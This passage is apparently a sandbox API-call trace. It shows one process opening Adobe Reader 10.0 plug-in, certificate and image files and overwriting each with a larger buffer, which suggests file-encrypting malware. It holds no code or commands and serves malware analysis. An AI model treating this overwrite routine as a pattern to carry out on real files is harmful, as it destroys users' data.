SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0092.293] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.293] ReleaseMutex (hMutex=0x168) returned 1 [0092.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.POL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.POL", cchWideChar=10, lpMultiByteStr=0x1f735cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.POL", lpUsedDefaultChar=0x0) returned 10 [0092.294] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.373] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.373] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.373] CloseHandle (hObject=0x204) returned 1 [0092.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\MCIMPP.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\mcimpp.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0092.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.375] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.375] ReleaseMutex (hMutex=0x168) returned 1 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.RUS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.RUS", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.RUS", lpUsedDefaultChar=0x0) returned 10 [0092.375] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.382] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.382] WriteFile (in: hFile=0x204, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.383] CloseHandle (hObject=0x204) returned 1 [0092.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\MCIMPP.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\mcimpp.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.384] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0092.384] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.384] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.384] ReleaseMutex (hMutex=0x168) returned 1 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.SLV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.SLV", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.SLV", lpUsedDefaultChar=0x0) returned 10 [0092.384] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.490] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.490] WriteFile (in: hFile=0x204, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.494] CloseHandle (hObject=0x204) returned 1 [0092.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\MCIMPP.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\mcimpp.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.495] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.496] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0092.496] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.496] ReleaseMutex (hMutex=0x168) returned 1 [0092.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.UKR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.UKR", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.UKR", lpUsedDefaultChar=0x0) returned 10 [0092.496] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.511] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.511] WriteFile (in: hFile=0x204, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.512] CloseHandle (hObject=0x204) returned 1 [0092.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.513] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.513] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x63263 [0092.513] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.513] ReleaseMutex (hMutex=0x168) returned 1 [0092.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.api", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.api", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.api", lpUsedDefaultChar=0x0) returned 13 [0092.513] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x62263 [0092.522] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.535] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x62263 [0092.536] WriteFile (in: hFile=0x204, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.536] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0092.536] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.536] CloseHandle (hObject=0x204) returned 1 [0092.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.537] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.537] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6a590 [0092.538] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.538] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.538] ReleaseMutex (hMutex=0x168) returned 1 [0092.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvDX8.x3d", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvDX8.x3d", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="drvDX8.x3d", lpUsedDefaultChar=0x0) returned 10 [0092.538] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.548] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x69590 [0092.548] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.592] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x69590 [0092.593] WriteFile (in: hFile=0x204, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.593] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0092.593] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.593] CloseHandle (hObject=0x204) returned 1 [0092.593] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x44a [0092.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.603] ReleaseMutex (hMutex=0x168) returned 1 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTC.der", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTC.der", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RTC.der", lpUsedDefaultChar=0x0) returned 7 [0092.603] ReadFile (in: hFile=0x1d4, lpBuffer=0x269c668, nNumberOfBytesToRead=0x44a, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x359f2bc*=0x44a, lpOverlapped=0x0) returned 1 [0092.610] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.611] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x9d2, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x359f2d0*=0x9d2, lpOverlapped=0x0) returned 1 [0092.611] CloseHandle (hObject=0x1d4) returned 1 [0092.611] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\distribute_form.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x335 [0092.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.612] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.612] ReleaseMutex (hMutex=0x168) returned 1 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="distribute_form.gif", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="distribute_form.gif", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="distribute_form.gif", lpUsedDefaultChar=0x0) returned 19 [0092.612] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bd8, nNumberOfBytesToRead=0x335, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesRead=0x359f2bc*=0x335, lpOverlapped=0x0) returned 1 [0092.621] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.621] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x8bd, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x8bd, lpOverlapped=0x0) returned 1 [0092.621] CloseHandle (hObject=0x1d4) returned 1 [0092.621] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\form_responses.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.622] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.622] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3c9 [0092.622] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.622] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.622] ReleaseMutex (hMutex=0x168) returned 1 [0092.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="form_responses.gif", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="form_responses.gif", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="form_responses.gif", lpUsedDefaultChar=0x0) returned 18 [0092.622] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3c9, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x359f2bc*=0x3c9, lpOverlapped=0x0) returned 1 [0092.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.631] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x951, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x359f2d0*=0x951, lpOverlapped=0x0) returned 1 [0092.631] CloseHandle (hObject=0x1d4) returned 1 [0092.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_super.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.632] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.632] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x32e [0092.632] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.632] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.632] ReleaseMutex (hMutex=0x168) returned 1 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_super.gif", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_super.gif", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reviews_super.gif", lpUsedDefaultChar=0x0) returned 17 [0092.632] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bd8, nNumberOfBytesToRead=0x32e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesRead=0x359f2bc*=0x32e, lpOverlapped=0x0) returned 1 [0092.665] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.665] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x8b6, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x8b6, lpOverlapped=0x0) returned 1 [0092.665] CloseHandle (hObject=0x1d4) returned 1 [0092.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_ok.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.666] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.666] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, 